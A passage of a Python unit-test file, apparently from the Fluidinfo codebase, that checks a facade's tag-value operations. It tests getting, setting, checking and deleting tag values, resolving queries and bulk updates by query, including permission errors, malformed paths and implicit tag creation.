"""
result = TagAPI(self.user).create([(u'username/tag', u'description')])
[(objectID, path)] = result
TagValueAPI(self.user).set({objectID: {u'username/tag': None}})
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
value, tagValue = yield self.facade.getTagInstance(
session, u'username/tag', str(objectID))
self.assertEqual(None, guessValue(value))
self.assertEqual(FluidinfoTagValue, type(tagValue))
@inlineCallbacks
def testGetTagInstanceWithNoneValue(self):
"""
L{FacadeTagValueMixin.getTagInstance} returns a Thrift value for the
specified L{Tag.path} and object ID.
"""
result = TagAPI(self.user).create([(u'username/tag', u'description')])
[(objectID, path)] = result
TagValueAPI(self.user).set({objectID: {u'username/tag': None}})
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
value, tagValue = yield self.facade.getTagInstance(
session, u'username/tag', str(objectID))
self.assertEqual(None, guessValue(value))
@inlineCallbacks
def testGetTagInstanceWithBoolValue(self):
"""
L{FacadeTagValueMixin.getTagInstance} returns a Thrift value for the
specified L{Tag.path} and object ID.
"""
result = TagAPI(self.user).create([(u'username/tag', u'description')])
[(objectID, path)] = result
TagValueAPI(self.user).set({objectID: {u'username/tag': False}})
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
value, tagValue = yield self.facade.getTagInstance(
session, u'username/tag', str(objectID))
self.assertEqual(False, guessValue(value))
@inlineCallbacks
def testGetTagInstanceWithIntValue(self):
"""
L{FacadeTagValueMixin.getTagInstance} returns a Thrift value for the
specified L{Tag.path} and object ID.
"""
result = TagAPI(self.user).create([(u'username/tag', u'description')])
[(objectID, path)] = result
TagValueAPI(self.user).set({objectID: {u'username/tag': 42}})
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
value, tagValue = yield self.facade.getTagInstance(
session, u'username/tag', str(objectID))
self.assertEqual(42, guessValue(value))
@inlineCallbacks
def testGetTagInstanceWithFloatValue(self):
"""
L{FacadeTagValueMixin.getTagInstance} returns a Thrift value for the
specified L{Tag.path} and object ID.
"""
result = TagAPI(self.user).create([(u'username/tag', u'description')])
[(objectID, path)] = result
TagValueAPI(self.user).set({objectID: {u'username/tag': 42.1}})
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
value, tagValue = yield self.facade.getTagInstance(
session, u'username/tag', str(objectID))
self.assertEqual(42.1, guessValue(value))
@inlineCallbacks
def testGetTagInstanceWithUnicodeValue(self):
"""
L{FacadeTagValueMixin.getTagInstance} returns a Thrift value for the
specified L{Tag.path} and object ID.
"""
result = TagAPI(self.user).create([(u'username/tag', u'description')])
[(objectID, path)] = result
TagValueAPI(self.user).set({objectID: {u'username/tag': u'value'}})
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
value, tagValue = yield self.facade.getTagInstance(
session, u'username/tag', str(objectID))
self.assertEqual(u'value', guessValue(value))
@inlineCallbacks
def testGetTagInstanceWithSetValue(self):
"""
L{FacadeTagValueMixin.getTagInstance} returns a Thrift value for the
specified L{Tag.path} and object ID.
"""
result = TagAPI(self.user).create([(u'username/tag', u'description')])
[(objectID, path)] = result
TagValueAPI(self.user).set(
{objectID: {u'username/tag': [u'foo', u'bar']}})
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
value, tagValue = yield self.facade.getTagInstance(
session, u'username/tag', str(objectID))
self.assertEqual([u'foo', u'bar'], guessValue(value))
@inlineCallbacks
def testGetTagInstanceWithBinaryValue(self):
"""
L{FacadeTagValueMixin.getTagInstance} returns a Thrift value for the
specified L{Tag.path} and object ID.
"""
TagAPI(self.user).create([(u'username/tag', u'description')])
objectID = uuid4()
thriftValue = createBinaryThriftValue('Hello, world!', 'text/plain')
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
yield self.facade.setTagInstance(session, u'username/tag',
str(objectID), thriftValue)
value, tagValue = yield self.facade.getTagInstance(
session, u'username/tag', str(objectID))
self.assertEqual('Hello, world!', value.binaryKey)
self.assertEqual('text/plain', value.binaryKeyMimeType)
@inlineCallbacks
def testGetTagInstanceWithFluidDBID(self):
"""
L{FacadeTagValueMixin.getTagInstance} correctly returns object IDs
when the C{fluiddb/id} L{Tag} is requested.
"""
TagAPI(self.user).create([(u'username/tag', u'description')])
objectID = uuid4()
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
thriftValue = createBinaryThriftValue('Hello, world!',
'text/plain')
yield self.facade.setTagInstance(session, u'username/tag',
str(objectID), thriftValue)
value, tagValue = yield self.facade.getTagInstance(
session, u'fluiddb/id', str(objectID))
self.assertEqual(str(objectID), guessValue(value))
@inlineCallbacks
def testSetTagInstanceWithUnknownTag(self):
"""
L{FacadeTagValueMixin.setTagInstance} raises a
L{TNonexistentTag} exception if the requested L{Tag.path}
doesn't exist and the user doesn't have permission to create it.
"""
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
thriftValue = createThriftValue(42)
deferred = self.facade.setTagInstance(session, u'unknown/path',
str(uuid4()), thriftValue)
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual(u'unknown/path', error.path)
@inlineCallbacks
def testSetTagInstanceWithImplicitTag(self):
"""
L{FacadeTagValueMixin.setTagInstance} implicitly creates a L{Tag} if
the L{User} making the request has permission to do so.
"""
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
thriftValue = createThriftValue(42)
objectID = uuid4()
yield self.facade.setTagInstance(session, u'username/unknown',
str(objectID), thriftValue)
value, tagValue = yield self.facade.getTagInstance(
session, u'username/unknown', str(objectID))
self.assertEqual(42, guessValue(value))
@inlineCallbacks
def testSetTagInstanceWithImplicitTagWithMalformedPath(self):
"""
L{FacadeTagValueMixin.setTagInstance} raises L{TInvalidPath} if one of
the paths for a nonexistent L{Tag} is malformed.
"""
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
thriftValue = createThriftValue(42)
objectID = uuid4()
deferred = self.facade.setTagInstance(session, u'username/$bad!',
str(objectID), thriftValue)
yield self.assertFailure(deferred, TInvalidPath)
@inlineCallbacks
def testSetTagInstancePermissionDenied(self):
"""
L{FacadeTagValueMixin.setTagInstance} raises a
L{TPathPermissionDenied} exception if the user doesn't have
C{Operation.WRITE_TAG_VALUE} permission.
"""
UserAPI().create([(u'fred', u'password', u'Fred',
u'fred@example.com')])
user = getUser(u'username')
permissions = CachingPermissionAPI(user)
TagAPI(user).create([(u'fred/bar', u'description')])
values = [(u'fred/bar', Operation.WRITE_TAG_VALUE,
Policy.CLOSED, [u'fred'])]
permissions.set(values)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
thriftValue = createThriftValue(42)
deferred = self.facade.setTagInstance(session, u'fred/bar',
str(uuid4()), thriftValue)
error = yield self.assertFailure(deferred, TPathPermissionDenied)
self.assertEqual(u'tag-values', error.category)
self.assertEqual('write', error.action)
self.assertEqual(u'fred/bar', error.path)
@inlineCallbacks
def testSetTagInstanceWithNoneValue(self):
"""L{FacadeTagValueMixin.setTagInstance} can store a C{None}."""
TagAPI(self.user).create([(u'username/bar', u'description')])
tag = getTags(paths=[u'username/bar']).one()
objectID = uuid4()
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
thriftValue = createThriftValue(None)
yield self.facade.setTagInstance(session, u'username/bar',
str(objectID), thriftValue)
self.store.rollback()
value = getTagValues(values=[(objectID, tag.id)]).one()
self.assertIdentical(self.user, value.creator)
self.assertEqual(objectID, value.objectID)
self.assertEqual(None, value.value)
@inlineCallbacks
def testSetTagInstanceWithBoolValue(self):
"""L{FacadeTagValueMixin.setTagInstance} can store a C{bool}."""
TagAPI(self.user).create([(u'username/bar', u'description')])
tag = getTags(paths=[u'username/bar']).one()
objectID = uuid4()
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
thriftValue = createThriftValue(True)
yield self.facade.setTagInstance(session, u'username/bar',
str(objectID), thriftValue)
self.store.rollback()
value = getTagValues(values=[(objectID, tag.id)]).one()
self.assertIdentical(self.user, value.creator)
self.assertEqual(objectID, value.objectID)
self.assertEqual(True, value.value)
@inlineCallbacks
def testSetTagInstanceWithIntValue(self):
"""L{FacadeTagValueMixin.setTagInstance} can store an C{int}."""
TagAPI(self.user).create([(u'username/bar', u'description')])
tag = getTags(paths=[u'username/bar']).one()
objectID = uuid4()
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
thriftValue = createThriftValue(42)
yield self.facade.setTagInstance(session, u'username/bar',
str(objectID), thriftValue)
self.store.rollback()
value = getTagValues(values=[(objectID, tag.id)]).one()
self.assertIdentical(self.user, value.creator)
self.assertEqual(objectID, value.objectID)
self.assertEqual(42, value.value)
@inlineCallbacks
def testSetTagInstanceWithFloatValue(self):
"""L{FacadeTagValueMixin.setTagInstance} can store a C{float}."""
TagAPI(self.user).create([(u'username/bar', u'description')])
tag = getTags(paths=[u'username/bar']).one()
objectID = uuid4()
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
thriftValue = createThriftValue(42.31)
yield self.facade.setTagInstance(session, u'username/bar',
str(objectID), thriftValue)
self.store.rollback()
value = getTagValues(values=[(objectID, tag.id)]).one()
self.assertIdentical(self.user, value.creator)
self.assertEqual(objectID, value.objectID)
self.assertEqual(42.31, value.value)
@inlineCallbacks
def testSetTagInstanceWithUnicodeValue(self):
"""
L{FacadeTagValueMixin.setTagInstance} can store a C{unicode} string.
"""
TagAPI(self.user).create([(u'username/bar', u'description')])
tag = getTags(paths=[u'username/bar']).one()
objectID = uuid4()
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
thriftValue = createThriftValue(u'foo bar')
yield self.facade.setTagInstance(session, u'username/bar',
str(objectID), thriftValue)
self.store.rollback()
value = getTagValues(values=[(objectID, tag.id)]).one()
self.assertIdentical(self.user, value.creator)
self.assertEqual(objectID, value.objectID)
self.assertEqual(u'foo bar', value.value)
@inlineCallbacks
def testSetTagInstanceWithSetValue(self):
"""
L{FacadeTagValueMixin.setTagInstance} can store a C{set} of C{unicode}
strings.
"""
TagAPI(self.user).create([(u'username/bar', u'description')])
tag = getTags(paths=[u'username/bar']).one()
objectID = uuid4()
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
thriftValue = createThriftValue([u'foo', u'bar'])
yield self.facade.setTagInstance(session, u'username/bar',
str(objectID), thriftValue)
self.store.rollback()
value = getTagValues(values=[(objectID, tag.id)]).one()
self.assertIdentical(self.user, value.creator)
self.assertEqual(objectID, value.objectID)
self.assertEqual([u'foo', u'bar'], value.value)
@inlineCallbacks
def testSetTagInstanceWithBinaryValue(self):
"""
L{FacadeTagValueMixin.setTagInstance} can store a binary L{TagValue}.
"""
TagAPI(self.user).create([(u'username/bar', u'description')])
objectID = uuid4()
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
thriftValue = createBinaryThriftValue('Hello, world!',
'text/plain')
yield self.facade.setTagInstance(session, u'username/bar',
str(objectID), thriftValue)
value, tagValue = yield self.facade.getTagInstance(
session, u'username/bar', str(objectID))
self.assertEqual('text/plain', value.binaryKeyMimeType)
self.assertEqual('Hello, world!', value.binaryKey)
@inlineCallbacks
def testHasTagInstanceUnknownTag(self):
"""
L{FacadeTagValueMixin.hasTagInstance} raises a L{TNonexistentTag}
exception if the requested L{Tag.path} doesn't exist.
"""
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.hasTagInstance(session, u'username/unknown',
str(uuid4()))
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual(u'username/unknown', error.path)
@inlineCallbacks
def testHasTagInstancePermissionDenied(self):
"""
L{FacadeTagValueMixin.hasTagInstance} raises a
L{TNonexistentTag} exception if the user doesn't have
C{Operation.READ_TAG_VALUE} permission.
"""
UserAPI().create([(u'fred', u'password', u'User',
u'fred@example.com')])
user = getUser(u'username')
permissions = CachingPermissionAPI(user)
TagAPI(user).create([(u'fred/bar', u'description')])
tag = getTags(paths=[u'fred/bar']).one()
values = [(u'fred/bar', Operation.READ_TAG_VALUE, Policy.CLOSED,
[u'fred'])]
permissions.set(values)
objectID = uuid4()
createTagValue(user.id, tag.id, objectID, 42)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.hasTagInstance(session, u'fred/bar',
str(objectID))
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual(u'fred/bar', error.path)
@inlineCallbacks
def testHasTagInstanceExists(self):
"""
L{FacadeTagValueMixin.hasTagInstance} returns C{True} if a L{Tag.path}
on an object exists.
"""
TagAPI(self.user).create([(u'username/bar', u'description')])
tag = getTags(paths=[u'username/bar']).one()
objectID = uuid4()
createTagValue(self.user.id, tag.id, objectID, 42)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
results = yield self.facade.hasTagInstance(
session, u'username/bar', str(objectID))
self.assertTrue(results)
@inlineCallbacks
def testHasTagInstanceNotExists(self):
"""
L{FacadeTagValueMixin.hasTagInstance} returns C{False} if a L{Tag.path}
on an object doesn't exist.
"""
TagAPI(self.user).create([(u'username/bar', u'description')])
objectID = uuid4()
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
results = yield self.facade.hasTagInstance(
session, u'username/bar', str(objectID))
results = guessValue(results)
self.assertFalse(results)
@inlineCallbacks
def testDeleteTagInstanceUnknownTag(self):
"""
L{FacadeTagValueMixin.deleteTagInstance} raises a L{TNonexistentTag}
exception if the requested L{Tag.path} doesn't exist.
"""
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.deleteTagInstance(
session, u'username/unknown', str(uuid4()))
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual(u'username/unknown', error.path)
@inlineCallbacks
def testDeleteTagInstancePermissionDenied(self):
"""
L{FacadeTagValueMixin.deleteTagInstance} raises a
L{TPathPermissionDenied} exception if the user doesn't have
C{Operation.DELETE_TAG_VALUE} permission.
"""
UserAPI().create([(u'fred', u'password', u'User',
u'fred@example.com')])
user = getUser(u'username')
permissions = CachingPermissionAPI(user)
TagAPI(user).create([(u'fred/bar', u'description')])
tag = getTags(paths=[u'fred/bar']).one()
values = [(u'fred/bar', Operation.DELETE_TAG_VALUE, Policy.CLOSED,
[u'fred'])]
permissions.set(values)
objectID = uuid4()
createTagValue(user.id, tag.id, objectID, 42)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.deleteTagInstance(session, u'fred/bar',
str(objectID))
error = yield self.assertFailure(deferred, TPathPermissionDenied)
self.assertEqual(u'tag-values', error.category)
self.assertEqual('delete', error.action)
self.assertEqual(u'fred/bar', error.path)
@inlineCallbacks
def testDeleteTagInstance(self):
"""
L{FacadeTagValueMixin.deleteTagInstance} deletes a L{TagValue} on a
given object.
"""
TagAPI(self.user).create([(u'username/bar', u'description')])
tag = getTags(paths=[u'username/bar']).one()
objectID = uuid4()
createTagValue(self.user.id, tag.id, objectID, 42)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
yield self.facade.deleteTagInstance(session, u'username/bar',
str(objectID))
self.store.rollback()
result = getTagValues([(objectID, tag.id)])
self.assertTrue(result.is_empty())
class FacadeTagValueMixinQueriesTest(FluidinfoTestCase):
resources = [('cache', CacheResource()),
('client', IndexResource()),
('config', ConfigResource()),
('log', LoggingResource()),
('store', DatabaseResource()),
('threadPool', ThreadPoolResource())]
def setUp(self):
super(FacadeTagValueMixinQueriesTest, self).setUp()
createSystemData()
self.transact = Transact(self.threadPool)
factory = FluidinfoSessionFactory('API-9000')
self.facade = Facade(self.transact, factory)
UserAPI().create([(u'username', u'password', u'User',
u'user@example.com')])
self.user = getUser(u'username')
self.permissions = CachingPermissionAPI(self.user)
self.store.commit()
self.config.set('service', 'development', 'true')
@inlineCallbacks
def testResolveQueryWithWrongEncoding(self):
"""
L{FacadeTagValueMixin.resolveQuery} raises L{TBadRequest} if the query
is not properly encoded in UTF-8.
"""
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.resolveQuery(session,
'fluiddb/about == "\xFF"')
yield self.assertFailure(deferred, TBadRequest)
@inlineCallbacks
def testResolveQueryWithParseError(self):
"""
L{FacadeTagValueMixin.resolveQuery} raises L{TParseError} if the query
is not well formed.
"""
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.resolveQuery(session, 'wrong query >:)')
yield self.assertFailure(deferred, TParseError)
@inlineCallbacks
def testResolveQueryWithIllegalQuery(self):
"""
L{FacadeTagValueMixin.resolveQuery} raises L{TBadRequest} if the query
contains an illegal expression.
"""
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.resolveQuery(session, 'has fluiddb/about')
yield self.assertFailure(deferred, TBadRequest)
@inlineCallbacks
def testResolveQueryWithSearchError(self):
"""
L{FacadeTagValueMixin.resolveQuery} raises L{TParseError} if the query
triggers a search error, as C{has fluiddb/id} does.
"""
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.resolveQuery(session, 'has fluiddb/id')
yield self.assertFailure(deferred, TParseError)
@inlineCallbacks
def testResolveQueryWithPermissionDeniedError(self):
"""
L{FacadeTagValueMixin.resolveQuery} raises L{TNonexistentTag} if
the user doesn't have READ permissions on tags in the query.
"""
TagAPI(self.user).create([(u'username/tag', u'description')])
permissions = CachingPermissionAPI(self.user)
values = [(u'username/tag', Operation.READ_TAG_VALUE,
Policy.CLOSED, [])]
permissions.set(values)
self.store.commit()
runDataImportHandler(self.client.url)
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.resolveQuery(session,
'username/tag = "value"')
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual(u'username/tag', error.path)
@inlineCallbacks
def testResolveQueryWithUnknownPaths(self):
"""
L{FacadeTagValueMixin.resolveQuery} raises L{TNonexistentTag} if a path
in the query doesn't exist.
"""
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.resolveQuery(session, 'unknown/tag = 26')
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual('unknown/tag', error.path)
@inlineCallbacks
def testResolveQuery(self):
"""
L{FacadeTagValueMixin.resolveQuery} returns the results of a query.
"""
TagAPI(self.user).create([(u'username/tag1', u'description'),
(u'username/tag2', u'description')])
self.store.commit()
object1 = uuid4()
object2 = uuid4()
TagValueAPI(self.user).set({object1: {u'username/tag1': 20,
u'username/tag2': 20},
object2: {u'username/tag1': 20,
u'username/tag2': 20},
uuid4(): {u'username/tag1': 20,
u'username/tag2': 10}})
runDataImportHandler(self.client.url)
with login(u'username', uuid4(), self.transact) as session:
results = yield self.facade.resolveQuery(session,
'username/tag2 = 20')
self.assertEqual(sorted([str(object1), str(object2)]),
sorted(results))
@inlineCallbacks
def testUpdateValuesForQueriesWithInvalidQuery(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} raises a
L{TParseError} exception if the incoming L{Query} can't be parsed.
"""
queryItems = [(u'username/unknown 42',
[TagPathAndValue(u'username/unknown', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.updateValuesForQueries(session,
valuesQuerySchema)
yield self.assertFailure(deferred, TParseError)
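# Every C{ValuesQuerySchema} built in these tests has the same shape: a
# list of (query, values) pairs, where each values list holds
# L{TagPathAndValue} instances naming the tag to write and the value to
# store on every object the query matches. A minimal sketch:
#
#     schema = ValuesQuerySchema(
#         [(u'username/bar = 42',
#           [TagPathAndValue(u'username/bar', 2600)])])
#     yield self.facade.updateValuesForQueries(session, schema)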
@inlineCallbacks
def testUpdateValuesForQueriesWithIllegalQuery(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} raises a L{TBadRequest}
exception if the incoming L{Query} contains an illegal expression.
"""
queryItems = [(u'has fluiddb/about',
[TagPathAndValue(u'username/unknown', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.updateValuesForQueries(session,
valuesQuerySchema)
yield self.assertFailure(deferred, TBadRequest)
@inlineCallbacks
def testUpdateValuesForQueriesWithSearchError(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} raises a
L{TParseError} exception if the incoming L{Query} triggers a search error.
"""
value = TagPathAndValue(u'username/unknown', 2600)
items = [(u'has fluiddb/id', [value])]
schema = ValuesQuerySchema(items)
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.updateValuesForQueries(session, schema)
yield self.assertFailure(deferred, TParseError)
@inlineCallbacks
def testUpdateValuesForQueriesWithUnknownTagInQuery(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} raises a
L{TNonexistentTag} exception if any of the requested L{Tag.path} in the
L{Query} doesn't exist.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description'),
(u'username/foo', u'description')])
objectID1 = uuid4()
objectID2 = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID1: {u'username/foo': 12},
objectID2: {u'username/foo': 42}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [
(u'username/unknown-to-read = 42 or username/foo = 12',
[TagPathAndValue(u'username/bar', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
deferred = self.facade.updateValuesForQueries(session,
valuesQuerySchema)
yield self.assertFailure(deferred, TNonexistentTag)
@inlineCallbacks
def testUpdateValuesForQueriesWithUncreatablePaths(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} raises a
L{TNonexistentTag} exception if any of the L{Tag.path}s to set don't
exist and the L{User} making the request doesn't have permission to
create them.
"""
TagAPI(self.user).create([(u'username/bar', u'description')])
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {uuid4(): {u'username/bar': 42}}
SecureTagValueAPI(self.user).set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [
(u'username/bar = 42',
[TagPathAndValue(u'wubble/unknown-to-set', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
deferred = self.facade.updateValuesForQueries(session,
valuesQuerySchema)
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual(u'wubble/unknown-to-set', error.path)
@inlineCallbacks
def testUpdateValuesForQueriesWithImplicitTags(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} implicitly creates
missing L{Tag}s if the L{User} has permission to create them.
"""
TagAPI(self.user).create([(u'username/bar', u'description')])
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
objectID = uuid4()
values = {objectID: {u'username/bar': 42}}
tagValues = SecureTagValueAPI(self.user)
tagValues.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'username/bar = 42',
[TagPathAndValue(u'username/unknown', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
yield self.facade.updateValuesForQueries(session,
valuesQuerySchema)
result = tagValues.get([objectID], [u'username/unknown'])
tagValue = result[objectID][u'username/unknown'].value
self.assertEqual(2600, tagValue)
@inlineCallbacks
def testUpdateValuesForQueriesWithImplicitTagsWithMalformedPaths(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} raises L{TInvalidPath} if
the given paths for nonexistent L{Tag}s are invalid.
"""
TagAPI(self.user).create([(u'username/bar', u'description')])
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
objectID = uuid4()
values = {objectID: {u'username/bar': 42}}
tagValues = SecureTagValueAPI(self.user)
tagValues.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'username/bar = 42',
[TagPathAndValue(u'username/$bad!', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
deferred = self.facade.updateValuesForQueries(session,
valuesQuerySchema)
yield self.assertFailure(deferred, TInvalidPath)
@inlineCallbacks
def testUpdateValuesForQueriesWithImplicitNamespaces(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} implicitly creates
missing L{Namespace}s and L{Tag}s if the L{User} has permission to
create them.
"""
TagAPI(self.user).create([(u'username/bar', u'description')])
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
objectID = uuid4()
values = {objectID: {u'username/bar': 42}}
tagValues = SecureTagValueAPI(self.user)
tagValues.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'username/bar = 42',
[TagPathAndValue(u'username/bar/foo', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
yield self.facade.updateValuesForQueries(session,
valuesQuerySchema)
result = tagValues.get([objectID], [u'username/bar/foo'])
tagValue = result[objectID][u'username/bar/foo'].value
self.assertEqual(2600, tagValue)
@inlineCallbacks
def testUpdateValuesForQueriesWithImplicitNestedNamespaces(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} implicitly creates
missing L{Namespace}s and L{Tag}s if the L{User} has permission to
create them.
"""
TagAPI(self.user).create([(u'username/bar', u'description')])
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
objectID = uuid4()
values = {objectID: {u'username/bar': 42}}
tagValues = SecureTagValueAPI(self.user)
tagValues.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'username/bar = 42',
[TagPathAndValue(u'username/bar/foo/baz', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
yield self.facade.updateValuesForQueries(session,
valuesQuerySchema)
result = tagValues.get([objectID], [u'username/bar/foo/baz'])
tagValue = result[objectID][u'username/bar/foo/baz'].value
self.assertEqual(2600, tagValue)
@inlineCallbacks
def testUpdateValuesForQueriesWithReadPermissionDenied(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} raises a
L{TNonexistentTag} exception if the user doesn't have
C{Operation.READ_TAG_VALUE} permission on any of the L{Tag}s in the
L{Query}.
"""
UserAPI().create([(u'fred', u'password', u'Fred',
u'fred@example.com')])
user = getUser(u'username')
permissions = CachingPermissionAPI(user)
TagAPI(user).create([(u'fred/bar', u'description'),
(u'fred/unreadable', u'description')])
values = [(u'fred/unreadable', Operation.READ_TAG_VALUE,
Policy.CLOSED, [u'fred'])]
permissions.set(values)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'fred/unreadable = 42',
[TagPathAndValue(u'fred/bar', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
deferred = self.facade.updateValuesForQueries(session,
valuesQuerySchema)
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual(u'fred/unreadable', error.path)
@inlineCallbacks
def testUpdateValuesForQueriesWithWritePermissionDenied(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} raises a
L{TPathPermissionDenied} exception if the user doesn't have
C{Operation.WRITE_TAG_VALUE} permission on any of the outgoing L{Tag}s.
"""
UserAPI().create([(u'fred', u'password', u'Fred',
u'fred@example.com')])
user = getUser(u'fred')
permissions = CachingPermissionAPI(user)
TagAPI(user).create([(u'fred/bar', u'description'),
(u'fred/unwritable', u'description')])
values = {uuid4(): {u'fred/bar': 42}}
SecureTagValueAPI(user).set(values)
runDataImportHandler(self.client.url)
values = [(u'fred/unwritable', Operation.WRITE_TAG_VALUE,
Policy.CLOSED, [u'fred'])]
permissions.set(values)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'fred/bar = 42',
[TagPathAndValue(u'fred/unwritable', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
deferred = self.facade.updateValuesForQueries(session,
valuesQuerySchema)
error = yield self.assertFailure(deferred, TPathPermissionDenied)
self.assertEqual(u'tag-values', error.category)
self.assertEqual('write', error.action)
self.assertEqual(u'fred/unwritable', error.path)
@inlineCallbacks
def testUpdateValuesForQueriesWithEmptyQueryResults(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} does not fail if a
L{Query} results in an empty C{set}.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/bar': 42}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'username/bar = 123',
[TagPathAndValue(u'username/bar', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
yield self.facade.updateValuesForQueries(session,
valuesQuerySchema)
result = valuesAPI.get([objectID], [u'username/bar'])
tagValue = result[objectID][u'username/bar'].value
self.assertEqual(42, tagValue)
@inlineCallbacks
def testUpdateValuesForQueriesWithUnicodeAboutValue(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} can store a C{unicode}
string when the query involves a C{unicode} about-value.
"""
with login(u'username', uuid4(), self.transact) as session:
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID = yield self.facade.createObject(
session, about=u'éric serra'.encode('utf-8'))
objectID = UUID(objectID)
self.store.rollback()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/bar': 42}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'fluiddb/about = "éric serra"',
[TagPathAndValue(u'username/bar', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
yield self.facade.updateValuesForQueries(session,
valuesQuerySchema)
result = valuesAPI.get([objectID], [u'fluiddb/about'])
about = result[objectID][u'fluiddb/about'].value
self.assertEqual(u'éric serra', about)
result = valuesAPI.get([objectID], [u'username/bar'])
tagValue = result[objectID][u'username/bar'].value
self.assertEqual(2600, tagValue)
@inlineCallbacks
def testUpdateValuesForQueriesWithIntValue(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} can store an C{int}.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID = uuid4()
